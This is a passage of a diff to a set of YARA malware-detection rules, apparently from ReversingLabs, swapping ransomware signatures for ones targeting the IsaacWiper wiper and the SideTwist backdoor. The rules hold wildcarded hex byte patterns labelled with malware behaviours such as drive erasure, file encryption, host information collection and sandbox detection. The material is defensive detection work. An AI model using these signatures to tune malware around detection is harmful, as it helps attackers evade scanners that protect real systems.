8D ?? ?? ?? ?? 51 8B 55 ?? 52 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? + ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? 51 8D 95 ?? ?? ?? ?? 52 8D 85 ?? ?? ?? ?? 50 E8 ?? + ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8D 95 ?? ?? ?? ?? 52 + E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8B 4D ?? 51 8D 95 ?? ?? + ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? 51 8D 95 ?? + ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 + } + $erase_drives_recursively_2_p2 = { + C0 75 ?? E9 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D + ?? ?? ?? ?? 51 FF 95 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 75 ?? E9 ?? + ?? ?? ?? 6A ?? 8B 95 ?? ?? ?? ?? 52 FF 95 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? + ?? ?? ?? 73 ?? E9 ?? ?? ?? ?? 81 BD ?? ?? ?? ?? ?? ?? ?? ?? 76 ?? C7 85 ?? ?? ?? ?? + ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 6A ?? FF 95 ?? ?? ?? + ?? 89 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 51 8B 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 + ?? 6A ?? 6A ?? 6A ?? 8B 85 ?? ?? ?? ?? 50 FF 95 ?? ?? ?? ?? 6A ?? 8D 8D ?? ?? ?? ?? + 51 8B 95 ?? ?? ?? ?? 52 8B 85 ?? ?? ?? ?? 50 8B 8D ?? ?? ?? ?? 51 FF 95 ?? ?? ?? ?? + 8B 95 ?? ?? ?? ?? 52 FF 95 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 FF 55 ?? 8D 8D ?? ?? ?? + ?? 51 8B 95 ?? ?? ?? ?? 52 FF 95 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? + ?? 50 FF 95 ?? ?? ?? ?? 8B E5 5D C3 } condition: - uint16(0)==0x5A4D and ($find_files) and ( all of ($encrypt_files_p*)) and ($drop_ransom_note) + uint16(0)==0x5A4D and ($destroy_if_not_controller) and ($erase_drive_data) and ( all of ($erase_drives_recursively_*)) } -rule REVERSINGLABS_Win32_Ransomware_Paradise : TC_DETECTION MALICIOUS MALWARE FILE +rule REVERSINGLABS_Win32_Trojan_Isaacwiper : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Yara rule that detects Paradise ransomware." + description = "Yara rule that detects IsaacWiper trojan." author = "ReversingLabs" - id = "9a92a05c-5f26-59ed-9934-a24bb7c31d8d" - date = "2020-07-15" - modified = "2020-07-15" + id = "c0924e5e-a942-57a3-a9f9-e6be6efa4c73" + date = "2022-03-02" + modified = "2022-03-02" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.Paradise.yara#L1-L81" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "fc029bee999ec72416ac91d8386d4d270070035ad078bcab1dec11eea032c10b" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/trojan/Win32.Trojan.IsaacWiper.yara#L1-L76" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "c9fa43f44c33816a66f61255d101294da63df1afc5a27ed5817072040cd1eec5" score = 75 quality = 90 tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "Paradise" + tc_detection_type = "Trojan" + tc_detection_name = "IsaacWiper" tc_detection_factor = 5 importance = 25 strings: - $search_files = { - 53 56 57 68 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? - ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 59 89 75 ?? 85 F6 - 0F 84 ?? ?? ?? ?? FF 75 ?? 8B 3D ?? ?? ?? ?? 68 ?? ?? ?? ?? BB ?? ?? ?? ?? 53 56 FF - D7 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 89 45 ?? 83 F8 ?? 0F 84 ?? ?? - ?? ?? 83 65 ?? ?? 8B 45 ?? 8B 74 85 ?? 8D 95 ?? ?? ?? ?? 85 F6 74 ?? 0F B7 02 83 F8 - ?? 72 ?? 8D 48 ?? 83 F8 ?? 76 ?? 8B C8 0F B7 06 83 F8 ?? 72 ?? 83 F8 ?? 77 ?? 83 C0 - ?? 3B C8 0F B7 02 75 ?? 66 85 C0 74 ?? 83 C2 ?? 83 C6 ?? EB ?? 0F B7 02 EB ?? 66 3B - 06 1B C0 83 E0 ?? 40 EB ?? 33 C0 85 C0 0F 84 ?? ?? ?? ?? FF 45 ?? 83 7D ?? ?? 72 ?? - 8B 75 ?? 8D 85 ?? ?? ?? ?? 50 FF 75 ?? 68 ?? ?? ?? ?? 53 56 FF D7 83 C4 ?? F6 85 ?? - ?? ?? ?? ?? 74 ?? BA ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? BA ?? - ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 80 3D ?? ?? ?? ?? ?? 74 ?? BA - ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? 85 C0 74 ?? 56 E8 ?? ?? ?? ?? EB ?? F6 85 ?? ?? ?? - ?? ?? 74 ?? A1 ?? ?? ?? ?? 05 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? - 85 C0 75 ?? BA ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? BA ?? ?? ?? - ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 56 E8 ?? ?? ?? ?? 59 8D 85 ?? ?? ?? - ?? 50 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 75 ?? 68 - ?? ?? ?? ?? 53 FF 75 ?? FF D7 83 C4 ?? FF 75 ?? E8 ?? ?? ?? ?? 59 FF 75 ?? FF 15 ?? - ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 59 5F 5E 5B C9 C3 - } - $encrypt_files_p1 = { - 56 57 6A ?? BE ?? ?? ?? ?? 5F E8 ?? ?? ?? ?? 89 45 ?? 6A ?? 8D 45 ?? 50 56 E8 ?? ?? - ?? ?? 83 C4 ?? 83 C6 ?? 4F 75 ?? 33 F6 39 75 ?? 74 ?? 8D 45 ?? 50 A1 ?? ?? ?? ?? 0F - B7 88 ?? ?? ?? ?? 56 56 51 50 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 6A ?? 59 89 4D - ?? 33 C0 8A 90 ?? ?? ?? ?? 88 90 ?? ?? ?? ?? 3B C6 75 ?? 33 C0 40 3B C1 72 ?? 68 ?? - ?? ?? ?? 8D 45 ?? 50 68 ?? ?? ?? ?? 56 6A ?? 56 FF 75 ?? FF 15 ?? ?? ?? ?? FF 75 ?? - FF 15 ?? ?? ?? ?? 5F 5E C9 C3 56 FF 75 ?? FF 15 ?? ?? ?? ?? 56 FF 15 - } - $encrypt_files_p2 = { - 53 56 57 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 33 DB - 53 53 8D 44 24 ?? 50 89 5C 24 ?? FF D6 85 C0 75 ?? 68 ?? ?? ?? ?? 6A ?? 53 53 8D 44 - 24 ?? 50 FF D6 85 C0 75 ?? 89 5C 24 ?? 39 5C 24 ?? 75 ?? 53 FF 15 ?? ?? ?? ?? A1 ?? - ?? ?? ?? 0F B6 80 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF - 74 24 ?? E8 ?? ?? ?? ?? 59 53 FF 74 24 ?? FF 15 ?? ?? ?? ?? BE ?? ?? ?? ?? 56 53 53 - 53 53 C6 05 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 56 88 1D ?? ?? ?? ?? E8 - ?? ?? ?? ?? 59 33 C0 88 98 ?? ?? ?? ?? 3B C3 75 ?? 33 C0 40 83 F8 ?? 72 ?? 6A ?? 5E - 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83 C4 - ?? 6A ?? 53 53 8D 44 24 ?? 50 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 4E 75 ?? 8B 3D ?? - ?? ?? ?? 81 C7 ?? ?? ?? ?? 6A ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 85 C0 75 ?? 57 E8 - ?? ?? ?? ?? 59 5F 5E 5B 8B E5 5D C3 + $enumerate_physical_drives = { + 55 8B EC 81 EC ?? ?? ?? ?? 53 56 33 F6 89 55 ?? 57 89 4D ?? B3 ?? C7 45 ?? ?? ?? ?? + ?? 89 75 ?? 84 DB 0F 84 ?? ?? ?? ?? 8B D6 8D 4D ?? E8 ?? ?? ?? ?? 84 C0 0F 84 ?? ?? + ?? ?? 6A ?? 68 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? D1 E8 8D + 8D ?? ?? ?? ?? BF ?? ?? ?? ?? 89 45 ?? 2B F8 83 C4 ?? 66 83 7D ?? ?? 8D 0C 41 8D 45 + ?? 74 ?? 83 C0 ?? 66 83 38 ?? 75 ?? 8D 55 ?? 2B C2 D1 F8 8D 04 45 ?? ?? ?? ?? 50 8B + C2 8D 14 3F 50 E8 ?? ?? ?? ?? D1 E8 83 C4 ?? 3B C7 8D 48 ?? 0F 46 C1 8B 4D ?? 03 C8 + 89 4D ?? 83 F9 ?? 73 ?? 8B 3D ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? + 6A ?? 68 ?? ?? ?? ?? 50 B3 ?? FF D7 83 F8 ?? 74 ?? 46 50 89 75 ?? FF 15 ?? ?? ?? ?? + E9 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 74 ?? 32 DB E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? + 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 3D ?? ?? ?? ?? 0F 83 + ?? ?? ?? ?? 0F B7 85 ?? ?? ?? ?? 66 85 C0 0F 95 C1 66 85 C0 0F 84 ?? ?? ?? ?? 6A ?? + 68 ?? ?? ?? ?? BA ?? ?? ?? ?? 66 89 45 ?? 8D 4D ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? + ?? ?? ?? E8 ?? ?? ?? ?? D1 E8 8D 4D ?? BE ?? ?? ?? ?? 89 45 ?? 2B F0 83 C4 ?? 66 83 + 7D ?? ?? 8D 0C 41 8D 45 ?? 74 ?? 83 C0 ?? 66 83 38 ?? 75 ?? 8D 55 ?? 2B C2 D1 F8 8D + 04 45 ?? ?? ?? ?? 50 8B C2 8D 14 36 50 E8 ?? ?? ?? ?? D1 E8 83 C4 ?? 3B C6 8D 48 ?? + 0F 46 C1 8B 4D ?? 03 C8 89 4D ?? 83 F9 ?? 0F 83 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? + 6A ?? 68 ?? ?? ?? ?? 8D 45 ?? 50 FF D7 8B F0 83 FE ?? 0F 84 ?? ?? ?? ?? 6A ?? 8D 45 + ?? C7 45 ?? ?? ?? ?? ?? 50 6A ?? 8D 45 ?? 50 6A ?? 6A ?? 68 ?? ?? ?? ?? 56 FF 15 ?? + ?? ?? ?? 83 F8 ?? 0F 94 C3 75 ?? 33 C0 83 7D ?? ?? 0F 44 45 ?? 89 45 ?? 56 FF 15 ?? + ?? ?? ?? 84 DB EB ?? 84 C9 0F 84 ?? ?? ?? ?? 8B 5D ?? 8B D3 8B 4D ?? 6A ?? E8 ?? ?? + ?? ?? 8B 7D ?? 8A C8 83 C4 ?? 33 F6 84 C9 74 ?? 3B F3 74 ?? 6A ?? 8B D6 8B CF E8 ?? + ?? ?? ?? 8A C8 83 C4 ?? 46 83 C7 ?? 84 C9 75 ?? 46 84 C9 74 ?? 8B 5D ?? 3B F3 73 ?? + 6A ?? 8B D6 8B CF E8 ?? ?? ?? ?? 8A C8 83 C4 ?? 46 83 C7 ?? 84 C9 75 ?? 8A C1 5F 5E + 5B 8B E5 5D C3 } - $http_remote_connection = { - 53 56 57 FF 75 ?? 33 FF 8D 75 ?? 89 7D ?? E8 ?? ?? ?? ?? 59 89 7D ?? 57 57 57 FF 75 - ?? 57 FF 15 ?? ?? ?? ?? 89 45 ?? 3B C7 0F 84 ?? ?? ?? ?? 57 57 6A ?? 57 57 FF 75 ?? - FF 75 ?? 50 FF 15 ?? ?? ?? ?? 89 45 ?? 3B C7 0F 84 ?? ?? ?? ?? 33 C9 80 7D ?? ?? 57 - 0F 95 C1 B8 ?? ?? ?? ?? 49 23 C8 03 C8 51 57 57 57 FF 75 ?? 68 ?? ?? ?? ?? FF 75 ?? - FF 15 ?? ?? ?? ?? 8B D8 3B DF 74 ?? 57 57 57 57 53 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 33 - F6 57 57 8D 45 ?? 50 53 89 7D ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8B 45 ?? 03 C6 3B C7 - 75 ?? 89 7D ?? EB ?? 50 39 7D ?? 75 ?? E8 ?? ?? ?? ?? 59 EB ?? FF 75 ?? 6A ?? FF 15 - ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 89 45 ?? 8D 45 ?? 50 FF 75 ?? 8B 45 ?? 03 C6 50 53 - FF 15 ?? ?? ?? ?? 03 75 ?? 39 7D ?? 75 ?? 53 FF 15 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? - ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 39 7D ?? 75 ?? 33 C0 40 39 45 ?? 74 ?? 89 45 ?? E9 - ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 8B 45 ?? 59 59 5F 5E 5B - C9 C3 + $corrupt_drive_thread = { + 55 8B EC 83 E4 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 53 8B 5D ?? 56 57 85 DB 0F 84 ?? ?? + ?? ?? 83 7B ?? ?? 0F 85 ?? ?? ?? ?? 8B 43 ?? 8D 4C 24 ?? 03 C0 BA ?? ?? ?? ?? 50 53 + E8 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 83 C4 ?? D1 E8 33 C9 66 89 4C 44 ?? 8D 44 24 ?? 50 + FF D7 8B 35 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 6A ?? 8D 44 24 ?? 50 + FF 15 ?? ?? ?? ?? 6A ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 66 83 7C 24 ?? ?? 8D 44 24 + ?? 74 ?? 90 83 C0 ?? 66 83 38 ?? 75 ?? 8D 4C 24 ?? BA ?? ?? ?? ?? 2B C1 D1 F8 8D 04 + 45 ?? ?? ?? ?? 50 8B C1 8D 8C 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 84 24 ?? + ?? ?? ?? 50 FF D7 50 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF D6 6A ?? 6A ?? 6A ?? + 6A ?? 6A ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B F0 89 74 24 + ?? 83 FE ?? 0F 84 ?? ?? ?? ?? 8B 7B ?? 8B 5B ?? C7 44 24 ?? ?? ?? ?? ?? 85 DB 75 ?? + 81 FF ?? ?? ?? ?? 0F 82 ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? FF 15 ?? ?? ?? + ?? 89 84 24 ?? ?? ?? ?? B8 ?? ?? ?? ?? 8B 8C 84 ?? ?? ?? ?? 8B D1 C1 EA ?? 33 D1 69 + CA ?? ?? ?? ?? 03 C8 89 8C 84 ?? ?? ?? ?? 40 3D ?? ?? ?? ?? 72 ?? BA ?? ?? ?? ?? 8D + B4 24 ?? ?? ?? ?? 89 94 24 ?? ?? ?? ?? 0F 1F 80 ?? ?? ?? ?? 81 FA ?? ?? ?? ?? 75 ?? + 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 94 24 ?? ?? ?? ?? 8B 8C 94 ?? ?? ?? ?? 8B C1 + C1 E8 ?? 42 33 C8 89 94 24 ?? ?? ?? ?? 8B C1 25 ?? ?? ?? ?? C1 E0 ?? 33 C8 8B C1 25 + ?? ?? ?? ?? C1 E0 ?? 33 C8 8B C1 C1 E8 ?? 33 C1 89 06 83 C6 ?? 8D 84 24 ?? ?? ?? ?? + 3B F0 72 ?? 8B 74 24 ?? 8D 44 24 ?? 6A ?? 50 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 + 56 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8B 44 24 ?? 3D ?? ?? ?? ?? 75 ?? 2B F8 83 DB ?? E9 + ?? ?? ?? ?? 8B C7 0B C3 74 ?? 57 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 44 + 24 ?? 6A ?? 50 57 8D 84 24 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? + 5F 5E 33 C0 5B 8B E5 5D C2 } condition: - uint16(0)==0x5A4D and $search_files and $http_remote_connection and ( all of ($encrypt_files_p*)) + uint16(0)==0x5A4D and ($enumerate_physical_drives and $corrupt_drive_thread) } -rule REVERSINGLABS_Win32_Ransomware_MRAC : TC_DETECTION MALICIOUS MALWARE FILE +rule REVERSINGLABS_Win64_Backdoor_Sidetwist : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Yara rule that detects MRAC ransomware." + description = "Yara rule that detects SideTwist backdoor." author = "ReversingLabs" - id = "135c3dc9-bf08-5f00-bade-7054d9f33830" - date = "2022-02-21" - modified = "2022-02-21" + id = "979b442e-8739-54a8-b486-39fc5673791e" + date = "2024-03-18" + modified = "2024-03-18" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.MRAC.yara#L1-L69" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "04e8364dc9c726f4bb2d3035e5b7e8dab4cae124b2f047be6f11b865fab557a7" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/backdoor/Win64.Backdoor.SideTwist.yara#L1-L154" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "811fa73ede59493c71435743848a3fce3a1604ec4065ffcb0b43e9715dfa5c31" score = 75 quality = 90 tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "MRAC" + tc_detection_type = "Backdoor" + tc_detection_name = "SideTwist" tc_detection_factor = 5 importance = 25 strings: - $encrypt_files = { - B8 ?? ?? ?? ?? 66 8B 11 66 3B 10 75 ?? 66 85 D2 74 ?? 66 8B 51 ?? 66 3B 50 ?? 75 ?? - 83 C1 ?? 83 C0 ?? 66 85 D2 75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? 8B 75 ?? 85 C0 75 ?? B1 - ?? EB ?? 32 C9 8B 45 ?? 88 4D ?? 83 F8 ?? 72 ?? 8D 0C 45 ?? ?? ?? ?? 8B C6 81 F9 ?? - ?? ?? ?? 72 ?? 8B 76 ?? 83 C1 ?? 2B C6 83 C0 ?? 83 F8 ?? 77 ?? 51 56 E8 ?? ?? ?? ?? - 8A 4D ?? 83 C4 ?? 8A C1 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 8B 4D ?? 33 CD E8 ?? - ?? ?? ?? 8B E5 5D C2 ?? ?? E8 ?? ?? ?? ?? E8 + $anti_sandbox_detect_environment = { + 55 57 56 53 48 81 EC ?? ?? ?? ?? 48 8D AC 24 ?? ?? ?? ?? 89 4D ?? 48 89 55 ?? E8 ?? + ?? ?? ?? 48 C7 45 ?? ?? ?? ?? ?? 48 C7 45 ?? ?? ?? ?? ?? 48 8D 55 ?? 48 8D 45 ?? 4C + 8D 05 ?? ?? ?? ?? 48 89 C1 48 8B 05 ?? ?? ?? ?? FF D0 85 C0 75 ?? 48 8B 45 ?? 48 85 + C0 74 ?? B8 ?? ?? ?? ?? EB ?? B8 ?? ?? ?? ?? 84 C0 0F 84 ?? ?? ?? ?? 48 8D 45 ?? 48 + 89 C1 E8 ?? ?? ?? ?? 48 8B 55 ?? 48 8D 4D ?? 48 8D 45 ?? 49 89 C8 48 89 C1 E8 ?? ?? + ?? ?? 48 8D 45 ?? 48 8D 55 ?? 4C 8D 05 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 + ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8B 45 ?? 48 89 C1 + E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 89 C1 48 8B 05 ?? ?? ?? ?? FF + D0 85 C0 0F 94 C0 84 C0 74 ?? 48 8D 05 ?? ?? ?? ?? 48 89 C1 48 8B 05 ?? ?? ?? ?? FF + D0 BB ?? ?? ?? ?? BE ?? ?? ?? ?? EB } - $import_key = { - 8D 45 ?? 50 6A ?? 6A ?? 6A ?? FF 75 ?? 56 6A ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 - C0 0F 84 ?? ?? ?? ?? FF 75 ?? 6A ?? FF 15 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 - ?? 89 45 ?? 8D 4D ?? 51 50 6A ?? 6A ?? FF 75 ?? 56 6A ?? 68 ?? ?? ?? ?? FF 15 ?? ?? - ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 45 ?? 50 6A ?? 6A ?? FF 75 ?? FF 75 ?? FF 75 ?? FF - 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 45 ?? 50 6A ?? 68 ?? ?? ?? ?? FF 75 ?? FF - 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 8D 45 ?? 6A ?? 50 6A ?? FF - 75 ?? FF D6 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 6A ?? FF 75 ?? FF D6 85 C0 0F - 84 ?? ?? ?? ?? 8D 45 ?? 50 6A ?? FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? - 6A ?? 8D 45 ?? 50 6A ?? FF 75 ?? FF D6 85 C0 0F 84 ?? ?? ?? ?? 6A ?? FF 75 ?? FF 15 - ?? ?? ?? ?? 8B C8 F6 C1 ?? 75 ?? B8 ?? ?? ?? ?? EB ?? 8B C1 C1 E8 ?? 40 C1 E0 ?? 2B - C1 68 ?? ?? ?? ?? 89 45 ?? E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 0F 84 ?? ?? ?? ?? 6A - ?? 8D 45 ?? 50 68 ?? ?? ?? ?? 57 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? - 8B 45 ?? 3D ?? ?? ?? ?? 0F 92 C3 85 C0 74 ?? 68 ?? ?? ?? ?? 8D 45 ?? 50 57 6A ?? 0F - B6 C3 50 6A ?? FF 75 ?? FF 15 ?? ?? ?? ?? 8B 75 ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 8D - 45 ?? 50 FF 75 ?? 57 56 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? EB ?? 8B 75 ?? 84 - DB 74 + $collect_host_information = { + 55 53 48 81 EC ?? ?? ?? ?? 48 8D AC 24 ?? ?? ?? ?? 48 89 4D ?? 48 89 55 ?? C7 45 ?? + ?? ?? ?? ?? 8B 45 ?? 89 C0 48 BA ?? ?? ?? ?? ?? ?? ?? ?? 48 39 C2 72 ?? 48 01 C0 48 + 89 C1 E8 ?? ?? ?? ?? 48 89 45 ?? 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 55 ?? 48 + 8B 45 ?? 49 89 D0 48 8D 15 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? EB ?? E8 ?? ?? ?? ?? + 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 55 ?? 48 8B 45 ?? 49 89 D0 48 89 C2 B9 ?? + ?? ?? ?? 48 8B 05 ?? ?? ?? ?? FF D0 85 C0 0F 95 C0 84 C0 0F 84 ?? ?? ?? ?? 48 8D 45 + ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 4D ?? 48 8B 55 ?? 48 8D 45 ?? 49 89 C8 48 89 C1 E8 + ?? ?? ?? ?? 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? + 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 89 C3 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 + 89 C2 48 8D 4D ?? 48 8D 45 ?? 49 89 C9 49 89 D8 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 ?? + 48 8D 55 ?? 41 B9 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 55 ?? + 48 8B 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 ?? + 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C1 E8 + ?? ?? ?? ?? 48 8B 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 84 C0 74 ?? 48 8B 45 ?? 48 8D 15 ?? + ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 48 8B 45 ?? 48 89 + C1 E8 ?? ?? ?? ?? EB ?? 48 89 C3 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 89 D8 48 89 + C1 E8 ?? ?? ?? ?? 48 89 C3 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? EB ?? 48 89 C3 48 8D + 45 ?? 48 89 C1 E8 ?? ?? ?? ?? EB ?? 48 89 C3 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 + 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? EB ?? 48 89 C3 48 8B 45 ?? 48 89 C1 E8 ?? ?? ?? ?? + 48 89 D8 48 89 C1 E8 ?? ?? ?? ?? 90 48 8B 45 ?? 48 81 C4 ?? ?? ?? ?? 5B 5D C3 } - $find_files = { - 55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 83 EC ?? A1 ?? ?? ?? ?? 33 C5 89 - 45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 89 4D ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 - C4 ?? 85 C0 74 ?? 32 C0 E9 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B F0 68 ?? ?? - ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 89 06 FF - D7 85 C0 0F 84 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 90 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF D3 - F6 05 